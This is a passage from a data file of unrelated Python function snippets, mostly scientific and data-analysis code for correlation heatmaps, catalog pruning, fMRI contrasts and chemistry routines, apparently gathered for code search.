cluster_id in clusters_to_remove:\n self._catalog_dictionary.pop(cluster_id, None)", "def pairwise_correlation_difference(self):\r\n\r\n real_cat, synth_cat = self.to_cat(self.origdst, self.synthdst)\r\n\r\n real_cat_dem = self.get_demographics(real_cat)\r\n synth_cat_dem = self.get_demographics(synth_cat)\r\n\r\n corr_real_obj = associations(real_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n corr_synth_obj = associations(synth_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n\r\n corr_real = corr_real_obj['corr']\r\n corr_rand = corr_synth_obj['corr']\r\n\r\n substract_m = np.subtract(corr_real, corr_rand)\r\n prwcrdst = LA.norm(substract_m)\r\n\r\n return prwcrdst, substract_m", "def correlationZernike():\n Tfile='/home/jghao/research/decamFocus/psf_withseeing/finerGrid_coeff_matrix/zernike_coeff_finerGrid_training.cp'\n b=p.load(open(Tfile))\n x = b[:,0]\n y = b[:,1]\n z = b[:,2]\n theta = b[:,3]\n phi = b[:,4]\n fwhm = b[:,5]\n e1 = b[:,6]\n e2 = b[:,7]\n thetax = theta*np.cos(np.deg2rad(phi))\n thetay = theta*np.sin(np.deg2rad(phi))\n bb = b[:,7:68] #choose only those corresponding to M202\n #idx = np.concatenate((np.arange(9,28),np.arange(29,48),np.arange(49,68)))\n #bb = b[:,idx]\n evalue,evector,pca = getPCA(bb)\n coeff = np.corrcoef(bb.T)\n ok = coeff >= 0.65\n pl.matshow(coeff*ok)\n ind = np.arange(0,60)\n pl.xticks(ind,('Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20'),rotation=90,color='black')\n pl.yticks(ind,('Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20','Piston','Tip','Tilt','Astignism','Defocus','Astignism','Trefoil','Coma','Coma','Trefoil','Ashtray','Astigm.5th','Spherical','Astigm.5th','Ashtray','16','17','18','19','20'))\n pl.grid(color='yellow')", "def add_over(self: CorridorGroup, override: CorridorGroup) -> None:\n for key, corr_over in override.corridors.items():\n try:\n corr_base = self.corridors[key]\n except KeyError:\n self.corridors[key] = corr_over\n else:\n corr_base.extend(corr_over)", "def plot_multiple_correlations(df: pd.DataFrame, col1: str, col2: str, col_category: str, min_corr: float,\n plot_width: int = 500, plot_height: int = 400, jitter_scale: float = 0.4,\n circle_colours: list = ['#ffd54f', '#7986cb', '#4db6ac', '#f06292'],\n line_colours: list = ['#ffb300', '#3f51b5', '#00897b', '#d81b60']):\n legend_it = []\n\n p = figure(title='Correlation between {} and {} by {}'.format(col1, col2, col_category), plot_width=plot_width,\n plot_height=plot_height, tools=[\"save\"])\n\n correlations = []\n\n for ind, cat in enumerate(df[col_category].dropna().unique()):\n df_for_col = df[df[col_category] == cat].dropna()\n\n correlations.append(df_for_col[col1].corr(df_for_col[col2]))\n\n if any(corr >= min_corr for corr in correlations):\n\n for ind, cat in enumerate(df[col_category].dropna().unique()):\n df_for_col = df[df[col_category] == cat].dropna()\n source = ColumnDataSource(df_for_col)\n c = p.circle(x=jitter(col1, width=jitter_scale, range=p.x_range, distribution='normal'), y=col2,\n color=circle_colours[ind], alpha=1 - (ind * 0.5 ** ind), source=source)\n\n legend_it.append(('{} (r = {})'.format(cat, round(correlations[ind], 2)), [c]))\n\n for ind, cat in enumerate(df[col_category].dropna().unique()):\n df_for_col = df[df[col_category] == cat].dropna()\n par = np.polyfit(df_for_col[col1], df_for_col[col2], 1, full=True)\n slope = par[0][0]\n intercept = par[0][1]\n y_predicted = [slope * i + intercept for i in df_for_col[col1]]\n\n df_for_col['y_predicted'] = y_predicted\n\n source = ColumnDataSource(df_for_col)\n\n p.line(x=col1, y='y_predicted', color=line_colours[ind], alpha=0.8, line_width=2, source=source)\n\n p.title.text_font = p.xaxis.axis_label_text_font = p.yaxis.axis_label_text_font = \"Helvetica Neue\"\n p.xgrid.visible = p.ygrid.visible = False\n\n p.xaxis.axis_label = col1\n p.yaxis.axis_label = col2\n\n legend = Legend(items=legend_it, location=(0, 0))\n p.add_layout(legend, 'below')\n\n return p, True\n\n else:\n return -1, False", "def remove_random_rule(self):\n\n\t\ta = self.get_random_cell()\n\t\ta.remove_ProductRule(a.get_random_rule())", "def base_corr(self, cutoff=0.3, show=0):\n\tn = self.data_points\n\tlast_points = int(cutoff*n)\n\tfor i in range(2):\n\t self.the_result.y[i] = self.the_result.y[i] - self.the_result.y[i][:-last_points].mean()\n\tif show == 1 :\n\t return self.the_result\n\treturn self", "def compParDiff(self, chem) :\r\n import warnings\r\n warnings.warn('Partition and diffusion coefficients in homogenised stratum corneum are NOT calculated. '\r\n 'Only user-supplied values are used.')", "def testSetColorCorrectionList(self):\n self.node.color_corrections = self.color_corrections\n\n # We need to convert self.color_corrections to a set then to a list\n # so the order matches\n self.assertEqual(\n list(set(self.color_corrections)),\n self.node.color_corrections\n )", "def elimination_ofconc(a2_data):\n for data in a2_data.values():\n data.pop('conc')\n return a2_data", "def check_contrast_values(self, contrast = 'stim', normalized = False, save = False):\n\t\n\t\t# check each patch separately across runs \n\t\tcomparisons = [(0,1),(0,2),(0,3),(1,2),(1,3),(2,3)]\n\t\tfor i in range(12):\n\t\t\tif contrast == 'stim':\n\t\t\t\tdd = self.ROI_data_all['V1']['stim_con%i'%(i+1)].reshape((4, self.ROI_data_all['V1']['stim_con%i'%(i+1)].shape[0]/4)) \t\n\t\t\telif contrast == 'base':\n\t\t\t\tdd = self.ROI_data_all['V1']['base_con%i'%(i+1)].reshape((4, self.ROI_data_all['V1']['base_con%i'%(i+1)].shape[0]/4))\n\t\t\tcounter = 0\t\n\t\t\tfor c in comparisons:\t\n\t\t\t\tax = plt.subplot(12,6,((i*6) + counter))\n\t\t\t\tax.scatter(dd[c[0]],dd[c[1]],label = str(round(pearsonr(dd[c[0]],dd[c[1]])[0],2)))\n\t\t\t\tax.legend(loc = 0)\n\t\t\t\tax.set_title(str(c[0]) + '-' + str(c[1]))\n\t\t\t\tcounter += 1\t\t\t\t\n\t\tif save == True:\n\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), self.contrast_type))\n\t\t\n\n\t\t# check correlations across patches \n\t\tcoef_matrix = []\n\t\tfig, axes = plt.subplots(2,2)\n\t\tfor run in range(4):\t\n\t\n\t\t\tcor_matrix = []\n\t\t\tax = axes.flat[run]\n\n\t\t\tfor patch in range(12):\n\t\t\t\tif contrast == 'stim':\n\t\t\t\t\tcor_matrix.append(self.ROI_data_all['V1']['stim_con%i'%(patch+1)].reshape((4, self.ROI_data_all['V1']['stim_con%i'%(patch+1)].shape[0]/4))[run])\n\t\t\t\telif contrast == 'base':\n\t\t\t\t\tcor_matrix.append(self.ROI_data_all['V1']['base_con%i'%(patch+1)].reshape((4, self.ROI_data_all['V1']['base_con%i'%(patch+1)].shape[0]/4))[run])\t\n\t\t\t\n\t\t\tif normalized == False:\t\t\t\n\t\t\t\tim = ax.imshow(np.corrcoef(cor_matrix), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\t\tax.set_title(\"run \" + str(run + 1))\n\n\t\t\telse:\n\t\t\t\t# zscore per voxel across patches\n\t\t\t\tcor_matrix = np.array(cor_matrix)\n\t\t\t\tvoxel_to_remove = [i for i in range(cor_matrix.shape[1]) if np.sum(np.where(cor_matrix[:,i] == 0)) > 0] # voxels that contain a value of 0 for one of the patches\n\t\t\t\tcor_matrix = np.delete(cor_matrix,voxel_to_remove,axis = 1)\n\t\t\t\tcor_matrix = (cor_matrix- cor_matrix.mean(axis = 0))/cor_matrix.std(axis=0) \n\t\t\t\tim = ax.imshow(np.corrcoef(cor_matrix), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\t\tax.set_title(\"run \" + str(run + 1))\n\n\t\t\t# store output of all runs\n\t\t\tcoef_matrix.append(np.corrcoef(cor_matrix))\n\n\t\t# finish figure with color_bar\n\t\tfig.subplots_adjust(right=0.8)\n\t\tcbar_ax = fig.add_axes([0.85, 0.05, 0.05, 0.87])\n\t\tfig.colorbar(im, cax=cbar_ax)\n\t\t\n\t\t# save figures (4 subbplots) \n\t\tif normalized == False:\n\t\t\tif save == True:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_' + contrast + \"_\" + self.contrast_type))\n\t\telse:\n\t\t\tif save == True:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_nor_' + contrast + \"_\" + self.contrast_type))\n\n\t\t\n\t\t# check correlations across patches for all runs combined (gfeat)\n\t\tcor_matrix_comb = []\n\t\tplt.figure()\n\t\tfor patch in range(12):\n\t\t\tif contrast == 'stim':\n\t\t\t\tcor_matrix_comb.append(self.ROI_data_all['V1']['stim_con_comb%i'%(patch+1)])\n\t\t\telif contrast == 'base':\n\t\t\t\tcor_matrix_comb.append(self.ROI_data_all['V1']['base_con_comb%i'%(patch+1)])\n\n\t\tif normalized == False:\t\n\t\t\tplt.imshow(np.corrcoef(cor_matrix_comb), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\tplt.title(\"combined\")\n\t\t\tplt.colorbar(ticks = [-1,0,1])\n\t\telse:\t\n\t\t\tcor_matrix_comb = np.array(cor_matrix_comb)\n\t\t\tvoxel_to_remove = [i for i in range(cor_matrix_comb.shape[1]) if np.sum(np.where(cor_matrix_comb[:,i] == 0)) > 0]\n\t\t\tcor_matrix_comb = np.delete(cor_matrix_comb,voxel_to_remove,axis = 1)\n\t\t\tcor_matrix_comb = (cor_matrix_comb- cor_matrix_comb.mean(axis = 0))/cor_matrix_comb.std(axis=0)\n\t\t\tplt.imshow(np.corrcoef(cor_matrix_comb), interpolation = 'nearest', vmin = -1, vmax = 1)\n\t\t\tplt.title('combined') \n\t\t\tplt.colorbar(ticks = [-1,0,1])\n\n\t\tif save == True:\n\t\t\tif normalized == False:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_comb_' + contrast + \"_\" + self.contrast_type))\n\t\t\telse:\n\t\t\t\tplt.savefig(os.path.join(self.stageFolder(stage = 'processed/mri/figs'), 'corr_comb_nor_' + contrast + \"_\" + self.contrast_type))\n\t\telse:\n\t\t\treturn coef_matrix, np.corrcoef(cor_matrix_comb)", "def tie_correction(sx):\r\n ux = unique(sx)\r\n uxl = searchsorted(sx, ux, 'left')\r\n uxr = searchsorted(sx, ux, 'right')\r\n return 1. - _corr_kw(uxr - uxl).sum() / float(_corr_kw(len(sx)))", "def SetPRBinCatConstraint( self, model ) :\n tot = np.dot( self.wish.T, self.dispo )\n for val in tot :\n if not val : continue\n if self.bound>0 : model += val <= self.valBound\n elif self.bound<0 : model += val >= self.valBound", "def set_crossrefs(self, refs):\n try_match = self.get_interaction()\n for interaction in list(refs.keys()):\n # find associated interaction\n if try_match == interaction:\n try_match.set_crossrefs(refs.pop(interaction))\n break\n # send what's left to the economics\n self._economics.set_crossrefs(refs)\n # if anything left, there's an issue\n assert not refs", "def neutralise(self):\n m = self.m\n\n # Regenerates computed properties like implicit\n # valence and ring information.\n m.UpdatePropertyCache(strict=False)\n numHs = []; tvs = []\n for ai in m.GetAtoms():\n numHs.append( ai.GetNumExplicitHs() + ai.GetNumImplicitHs() )\n tvs.append( ai.GetTotalValence() )\n\n self.get_charged_pairs()\n\n for i in range(self.na):\n ai = m.GetAtomWithIdx(i)\n ci = self.charges[i]\n if ci != 0:\n if i not in self.cpairs.ravel():\n msg = ' zi = %d, tvi = %d, ci = %d, neib = %d'%(self.zs[i], tvs[i], ci, cnsDic[zs[i]])\n assert tvs[i] - ci == cnsDic[zs[i]], msg\n if numHs[i] == 0 and ci > 0:\n # in the case of >[N+]<, i.e., N with CoordNum = 4\n # we don't have to do anything\n continue\n ai.SetFormalCharge( 0 )\n ai.SetNoImplicit(True)\n ai.SetNumExplicitHs( numHs[i]-ci )\n print('i, zi, ci, nH = ', self.zs[i], ci, numHs[i])\n self.m = m", "def multi_precisions_correlate1(self):\n self.query_dict={'code':code.value,'exchange':exchange.value,\\\n 'structure':struct.value,'element':element.value,'properties':prop.value}\n print ('POSTING', self.query_dict)\n if not self.query_dict['properties'] == 'Multi':\n self.query_api(endpoint='precvalue')\n self.prop_data = self.plot_data['s{}k'.format(self.properties)]\n self.energy_data = self.plot_data['sE0k'.format(self.properties)]\n\n layout_doc.children[4].children[0] = self.plot_precision_figure()\n pass", "def resetCoronalSegment(self):\r\n #research\r\n profprint()\r\n sGreen = slicer.mrmlScene.GetNodeByID(\"vtkMRMLSliceNodeGreen\")\r\n if sGreen == None :\r\n sGreen = slicer.mrmlScene.GetNodeByID(\"vtkMRMLSliceNode3\")\r\n reformatLogic = slicer.vtkSlicerReformatLogic()\r\n #sGreen.SetSliceVisible(0)\r\n sGreen.SetOrientationToCoronal()\r\n #sw = slicer.app.layoutManager().sliceWidget(\"Green\")\r\n #sw.fitSliceToBackground()\r\n sGreen.Modified()", "def correlation_map(self,property_list):\n\t\tself.property_existence(property_list)\n\n\t\tfig, ax = plt.subplots()\n\t\tcorr = self.df[property_list].corr()\n\t\tsns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, \n\t\t\tas_cmap=True), annot=True, ax=ax)\n\t\tfig.tight_layout()\n\t\tplt.show()", "def alt_clueset(self):\n sames = self.get_same_mapping()\n new_clues = []\n has_changes = False\n\n for clue in self.clueset:\n if (clue[\"type\"] != SAME and clue[\"type\"] != ISAT):\n alt = self.new_clue(sames, clue)\n if alt:\n new_clues.append(alt)\n has_changes = True\n else:\n new_clues.append(clue)\n\n return new_clues if has_changes else None", "def unifyComa(self):\n#\t#\tCMwrite(\"unifyComa\")\n\t\tfor i in range(len(self.coma)):\n\t\t\tfor j in range(len(self.coma)):\n\t\t\t\tif i == j and not self.coma[i,i] == 0.:\n\t\t\t\t\tself.coma[i,j] = 1.\n\t\t\t\t\tself.comaInv[i,j] = 1.\n\t\t\t\telse:\n\t\t\t\t\tself.coma[i,j] = 0.\n\t\t\t\t\tself.comaInv[i,j] = 0.\n\t\tself.specialCOMAs = {}", "def output_new_correlation_values():\n correlation_builder = _get_correlation_values()\n bv_data = correlation_builder.correlation_store.query(\n criteria={'property_x': 'bulk_modulus',\n 'property_y': 'vickers_hardness'}\n )\n \n print(\"Bulk Modulus/Vickers Hardness\")\n \n for item in bv_data:\n print(\"'{}': {},\".format(item['correlation_func'],\n item['correlation']))\n\n vb_data = correlation_builder.correlation_store.query(\n criteria={'property_y': 'bulk_modulus',\n 'property_x': 'vickers_hardness'}\n )\n\n print(\"Vickers Hardness/Bulk Modulus\")\n\n for item in vb_data:\n print(\"'{}': {},\".format(item['correlation_func'],\n item['correlation']))\n \n print('linlsq correlation values')\n\n bg_ad = correlation_builder.correlation_store.query_one(\n criteria={'property_x': 'band_gap_pbe',\n 'property_y': 'atomic_density',\n 'correlation_func': 'linlsq'}\n )\n\n bm_vh = correlation_builder.correlation_store.query_one(\n criteria={'property_x': 'bulk_modulus',\n 'property_y': 'vickers_hardness',\n 'correlation_func': 'linlsq'}\n )\n \n print(\"[{}, {}]\".format(bg_ad['correlation'], \n bm_vh['correlation']))", "def toggle_conms(self):\n name = 'conm2'\n if name in self.gui.geometry_actors:\n geometry_properties_change = {name : self.gui.geometry_properties[name]}\n visibility_prev = geometry_properties_change[name].is_visible\n geometry_properties_change[name].is_visible = not visibility_prev\n\n self.gui.on_update_geometry_properties_override_dialog(geometry_properties_change)", "def get_highly_correlated_feature_name_pairs(self,\n threshold = 0.7):\n\n self.X_corr = self.X.corr()\n self.X_corr = self.X_corr.where(\n np.triu(np.ones(self.X_corr.shape), k=1).astype(bool)\n )\n\n self.X_corr.to_csv(self.base_save_name + \"_X_corr.csv\")\n\n self.X_corr_pairs = self.X_corr \\\n .unstack() \\\n .sort_values(kind=\"quicksort\") \\\n .dropna()\n\n self.X_corr_pairs = self.X_corr_pairs[self.X_corr_pairs != 1]\n # name axis meaningfully.\n\n self.X_corr_pairs.to_csv(self.base_save_name + \"_X_corr_pairs.csv\", index=True)\n\n self.X_corr_above_thresh = self.X_corr[abs(self.X_corr) > threshold] \\\n .dropna(how=\"all\")\n\n # todo: Delete this. Reset_index is meaningless in this Series.\n self.X_corr_pairs.reset_index()\n print(\"after reset index\")\n\n print(self.X_corr_pairs.head())\n self.X_corr_pairs_set = set(self.X_corr_pairs.index.to_list())\n print(len(self.X_corr_pairs_set))", "def remove_dup_hypoDD_cat(catalog):\n rids = [ev.resource_id for ev in catalog]\n count = collections.Counter(rids)\n\n return catalog", "def calc_chromatic_coupling(self):\n raise NotImplementedError('Chromatic Coupling is not Implemented yet.')", "def clip_or_fit_solutions(self, pop, idx):\r\n for k in idx:\r\n self.repair_genotype(pop[k])", "def cre_confidence2(df): \r\n cre_list = df.creline.unique()\r\n areas = df.source.unique()\r\n n=len(areas)\r\n confnew =pd.DataFrame(np.zeros(len(df.index)),index=df.index, columns=['conf'])\r\n \r\n for kk in range(0,len(cre_list)):\r\n df_cre = df[df.creline == cre_list[kk]]\r\n print cre_list[kk]\r\n count_sym = 0\r\n count_sameffb = 0\r\n for ii in range(0,n):\r\n for jj in range(ii+1,n):\r\n ij_ffb = np.array(df_cre[(df.source == areas[ii])&(df.target == areas[jj])].ffb_c)\r\n ji_ffb = np.array(df_cre[(df.source == areas[jj])&(df.target == areas[ii])].ffb_c)\r\n if len(ij_ffb)==1 and len(ji_ffb)==1:\r\n count_sym = count_sym+1\r\n if ij_ffb == ji_ffb:\r\n count_sameffb = count_sameffb+1 \r\n confnew[df.creline == cre_list[kk]] = 1-count_sameffb/count_sym\r\n return confnew", "def complement(self):\n for cell in self.compact:\n cell.set(not cell.peg)", "def proximal(combo):\n return (combo & _PROXIMAL_MASK) >> _SHIFT", "def set_catalogue(self, catalogue, force_it=False,\n match_angsep=3, **kwargs):\n super(Image, self).set_catalogue(catalogue, force_it=force_it, **kwargs)\n\n # -- Lets save the pixel values\n if self.has_catalogue() and self.has_sepobjects():\n self.sepobjects.set_catalogue(catalogue,force_it=True,reset=False)\n self.sepobjects.match_catalogue(deltadist=match_angsep)", "def _populate_uncertainties(self):\n\n # Use the ExoParameter method to calculate uncertainties for all\n # attributes of self.\n for att in self.attributes:\n exo_param = getattr(self, att)\n exo_param.calculate_uncertainties()", "def clear_combobox_cases(self):\n\n self.ui.comboBox_case.blockSignals(True)\n self.ui.comboBox_case.setCurrentIndex(0)\n self.ui.comboBox_case.blockSignals(False)\n self.attribute_file_ids = []\n self.attributes_msg = \"\"\n self.ui.pushButton_attributes.setToolTip(\"\")", "def coalescence(self, initval, clusterList, coalescenceList, smeasure):\n intServ = InteractionService()\n intServ.coalescence(initval, clusterList, coalescenceList, smeasure)", "def _reset(self):\n if self.filename is None and not hasattr(self, 'coco_gt'):\n self.coco_gt = MaskCOCO()", "def unflip_colors(self):\n self.colors[self.bondA] = self.colA\n self.colors[self.bondB] = self.colB\n self.set_bcol(self.bondA)\n self.set_bcol(self.bondB)\n return", "def custom_reset(self):\n if self.similar:\n return [\"stocks\", \"ca\", f\"set {','.join(self.similar)}\"]\n return []", "def rec_default(self):\n self.pcdi_triggers.setText('(50,50)')\n self.pcdi_type.setText('LUCY')\n self.pcdi_iter.setText('20')\n self.pcdi_normalize.setText('true')\n self.pcdi_roi.setText('(16, 16, 16)')", "def testSetColorCorrectionSingle(self):\n self.node.color_corrections = self.color_corrections[0]\n\n self.assertEqual(\n [self.color_corrections[0]],\n self.node.color_corrections\n )", "def PerformPick(self, x, y, ignoreEntID = -1):\n pass", "def cull(self):", "def set_score_duplicates(interaction):\n same_interactions = custom_interactions[(custom_interactions['protein_1'] == interaction['protein_1']) & (\n custom_interactions['protein_2'] == interaction['protein_2'])]\n\n interactions_intacted = same_interactions[same_interactions['has_intacted'] == True]\n if not interactions_intacted.empty:\n index_max = interactions_intacted['score_1'].argmax()\n return interactions_intacted.loc[index_max]\n\n index_max = same_interactions['score_1'].argmax()\n return same_interactions.loc[index_max]", "def checkCorr(originalDF):\n # BEGIN: from https://www.kaggle.com/pmarcelino/comprehensive-data-exploration-with-python\n # EXPLANATION: This code visualizes the correlation matrix of the data \n # using heatmap, representing different correlation coefficients by \n # different colors.\n corrmat = originalDF.corr()\n f, ax = plt.subplots(figsize=(12,9))\n sns.heatmap(corrmat, vmax=.8, square=True)\n \n #Zoom in the important variables\n #saleprice correlation matrix\n k = 10 #number of variables for heatmap\n cols = corrmat.nlargest(k, 'SalePrice')['SalePrice'].index\n cm = np.corrcoef(originalDF[cols].values.T)\n sns.set(font_scale=1.25)\n hm = sns.heatmap(cm, cbar=True, annot=True, square=True, fmt='.2f', annot_kws={'size': 10}, yticklabels=cols.values, xticklabels=cols.values)\n plt.show()\n # END: from https://www.kaggle.com/pmarcelino/comprehensive-data-exploration-with-python\n \n \"\"\"\n It seems like 1stFlrSF and TotalBsmtSF, \n TotRmsAbvGr and GrLivArea, YearBuilt and GarageYrBlt, \n GarageArea and GarageCars are highly correlated respectively.\n Let us check the specific correlations.\n \"\"\"\n cor1 = originalDF.loc[:, \"1stFlrSF\"].corr(originalDF.loc[:, \"TotalBsmtSF\"])\n cor2 = originalDF.loc[:, \"TotRmsAbvGrd\"].corr(originalDF.loc[:, \"GrLivArea\"])\n cor3 = originalDF.loc[:, \"YearBuilt\"].corr(originalDF.loc[:, \"GarageYrBlt\"])\n cor4 = originalDF.loc[:, \"GarageArea\"].corr(originalDF.loc[:, \"GarageCars\"])\n \n print(\"1st Floor SF and Total Basement SF\")\n print(cor1)\n print(\"Total Rooms Above Ground and Ground Living Area\")\n print(cor2)\n print(\"Year Built and Garage Year Built\")\n print(cor3)\n print(\"Garage Area and Garage Cars\")\n print(cor4)\n \n # Maybe try dropping those with abs(corr) > 0.9?", "def _SetConnPrVal(self):\n\t\tlistsum = sum(self.freq_count)\n\t\t\"\"\"\n\t\tnow determine the connection priority of a \n\t\tparticular relation type with respect to other relations \n\t\t\"\"\"\n\t\tfor reln_type in range(4):\n\t\t\t\"\"\"\n\t\t\there we use the difference of current relation type \n\t\t\tfrequency with the frequencies of all other relations\n\t\t\t\"\"\"\n\t\t\t# comment - sourya\n\t\t\t#self.priority_reln[reln_type] = 2 * self.freq_count[reln_type] - listsum\n\t\t\t# add - sourya\n\t\t\tself.priority_reln[reln_type] = ((self.freq_count[reln_type] * 1.0) / listsum)", "def plot_correlation_comparison(evaluators: List, annot=False):\n nr_plots = len(evaluators) + 1\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n fig, ax = plt.subplots(2, nr_plots, figsize=(4 * nr_plots, 7))\n flat_ax = ax.flatten()\n flat_ax[nr_plots + 1].clear()\n fake_corr = []\n real_corr = associations(evaluators[0].real, nominal_columns=evaluators[0].categorical_columns, plot=False, theil_u=True,\n mark_columns=True, annot=False, cmap=cmap, cbar=False, ax=flat_ax[0])['corr']\n for i in range(1, nr_plots):\n cbar = True if i % (nr_plots - 1) == 0 else False\n fake_corr.append(\n associations(evaluators[i - 1].fake, nominal_columns=evaluators[0].categorical_columns, plot=False, theil_u=True,\n mark_columns=True, annot=False, cmap=cmap, cbar=cbar, ax=flat_ax[i])['corr']\n )\n if i % (nr_plots - 1) == 0:\n cbar = flat_ax[i].collections[0].colorbar\n cbar.ax.tick_params(labelsize=20)\n\n for i in range(1, nr_plots):\n cbar = True if i % (nr_plots - 1) == 0 else False\n diff = abs(real_corr - fake_corr[i - 1])\n sns.set(style=\"white\")\n az = sns.heatmap(diff, ax=flat_ax[i + nr_plots], cmap=cmap, vmax=.3, square=True, annot=annot, center=0,\n linewidths=0, cbar=cbar, fmt='.2f')\n if i % (nr_plots - 1) == 0:\n cbar = az.collections[0].colorbar\n cbar.ax.tick_params(labelsize=20)\n titles = ['Real'] + [e.name if e.name is not None else idx for idx, e in enumerate(evaluators)]\n for i, label in enumerate(titles):\n flat_ax[i].set_yticklabels([])\n flat_ax[i].set_xticklabels([])\n flat_ax[i + nr_plots].set_yticklabels([])\n flat_ax[i + nr_plots].set_xticklabels([])\n title_font = {'size': '28'}\n flat_ax[i].set_title(label, **title_font)\n plt.tight_layout()", "def isotropic_correction(self):\n isob = self.IsotropicCorrection(self,'back')\n isof = self.IsotropicCorrection(self,'front')\n sindec = np.sin(np.radians(np.array(self.df.dec.values,float)))\n fig, axx = plt.subplots(1,2, figsize=(12,5), sharey=True)\n ax=axx[1]\n for i in range(2):\n ax.plot(sindec, isob(i), '.', label='Energy Bin {}'.format(i));\n ax.set(xlabel='sin(Dec)', title='Back correction vs. Dec.')\n\n ax=axx[0]\n for f, name in [(isof, 'Front'), (isob, 'Back')]:\n means = [f(i)[np.abs(sindec)<0.25].mean() for i in range(8)]\n ax.plot(means, 'o', label=name)\n ax.set_title('Correction factor vs Energy Bin')\n ax.set(xlabel='Energy Bin',ylabel='Correction Factor',)\n\n for ax in axx:\n ax.grid(alpha=0.5);\n ax.axhline(1.0, color='k', ls='--')\n ax.legend()\n\n return fig", "def apply_kicks(self):\n\n\n for cor in self.orbit.corrs:\n if cor.ui.alarm:\n self.stop_feedback()\n logger.info(\"apply_kicks: kick exceeds limits. Try 'Uncheck Red' and recalculate correction\")\n self.error_box(\"kick exceeds limits. Try 'Uncheck Red' and recalculate correction\")\n return 0\n kick_table = []\n for cor in self.orbit.corrs:\n kick_mrad = cor.ui.get_value()\n logger.debug(cor.id + \" set: %s --> %s\" % (cor.ui.get_init_value(), kick_mrad))\n try:\n cor.mi.set_value(kick_mrad)\n kick_table.append({\"corrector\": cor.id, \"value\": kick_mrad})\n except Exception as e:\n logger.error(cor.id + \" apply_kicks Error: \" + str(e))\n self.cor_hist.append(kick_table)", "def twoPointCrossover(self, cl):\n points = []\n changed = False\n points.append( int( random.random() * ( cons.env.format_data.numb_attributes + 1 ) ) )\n secondPoint = int( random.random() * ( cons.env.format_data.numb_attributes + 1 ) )\n if points[0] > secondPoint:\n tempPoint = points[0]\n points[0] = secondPoint\n points.append( tempPoint )\n else:\n points.append( secondPoint )\n if cons.env.format_data.discrete_action:\n self_specified_atts = copy.deepcopy(self.specified_attributes)\n cl_specified_atts = copy.deepcopy(cl.specified_attributes)\n for i in range( points[1] ):\n if i >= points[0]:\n if i in self_specified_atts:\n if i not in cl_specified_atts:\n index = self.specified_attributes.index(i)\n cl.condition.append(self.condition.pop(index))\n cl.specified_attributes.append(i)\n self.specified_attributes.remove(i)\n changed = True #Remove att from self and add to cl\n elif i in cl_specified_atts:\n index = cl.specified_attributes.index(i) #reference to the position of the attribute in the rule representation\n self.condition.append(cl.condition.pop(index)) #Take attribute from self and add to cl\n self.specified_attributes.append(i)\n cl.specified_attributes.remove(i)\n changed = True\n return changed", "def test_resetcherrypick_restores_files_with_conflicts(\n repository: Repository, path: Path\n) -> None:\n createconflict(repository, path, ours=\"a\", theirs=\"b\")\n repository.resetcherrypick()\n\n assert path.read_text() == \"a\"", "def _prune_catalog(self) -> cat.Catalog:\n if self._import is None:\n return self._catalog\n\n needed_ids = self._find_needed_control_ids()\n\n # if a control includes controls - only include those that we know are needed\n final_control_ids = self._prune_controls(needed_ids)\n\n # build the needed groups of controls\n group_dict: Dict[str, cat.Group] = {}\n for control_id in final_control_ids:\n group_id, group_title, group_class = self._catalog_interface.get_group_info(control_id)\n group = group_dict.get(group_id)\n control = self._catalog_interface.get_control(control_id)\n if group is None:\n group = cat.Group(id=group_id, title=group_title, class_=group_class, controls=[control])\n group_dict[group_id] = group\n else:\n group_dict[group_id].controls.append(control)\n\n # find all referenced uuids - they should be 1:1 with those in backmatter\n needed_uuid_refs: Set[str] = self._find_all_uuid_refs(final_control_ids)\n\n # prune the list of resources to only those that are needed\n new_resources: Optional[List[common.Resource]] = []\n if self._catalog.back_matter is not None and self._catalog.back_matter.resources is not None:\n for resource in self._catalog.back_matter.resources:\n if resource.uuid in needed_uuid_refs:\n new_resources.append(resource)\n\n new_groups: Optional[List[cat.Group]] = list(group_dict.values())\n\n # should avoid empty lists so set to None if empty\n new_resources = new_resources if new_resources else None\n new_groups = new_groups if new_groups else None\n\n new_cat = cat.Catalog(\n uuid=str(uuid4()),\n metadata=self._catalog.metadata,\n back_matter=common.BackMatter(resources=new_resources),\n groups=new_groups\n )\n\n return new_cat", "def fixC(self,i,value):\n if self.coeffPattern[2] == None:\n m,n=self.m,self.n\n self.coeffPattern[2] = [None]*m\n self.coeffPattern[2][i]=value\n self._updateEstimatorSize(i)", "def swapProchiralResonance(resonance, makeAmbiguous=False):\n \n from ccpnmr.analysis.core.MoleculeBasic import areAtomsBound\n\n if resonance.resonanceSet and (len(resonance.resonanceSet.atomSets) == 1):\n atomSet = resonance.resonanceSet.findFirstAtomSet()\n atom = atomSet.findFirstAtom()\n chemAtom = atom.chemAtom\n chemAtomSet = chemAtom.chemAtomSet\n chemAtom0 = None\n \n if chemAtomSet:\n if chemAtomSet.isEquivalent:\n for chemAtomSet0 in chemAtom.chemComp.findAllChemAtomSets(isProchiral=True):\n chemAtomSets = 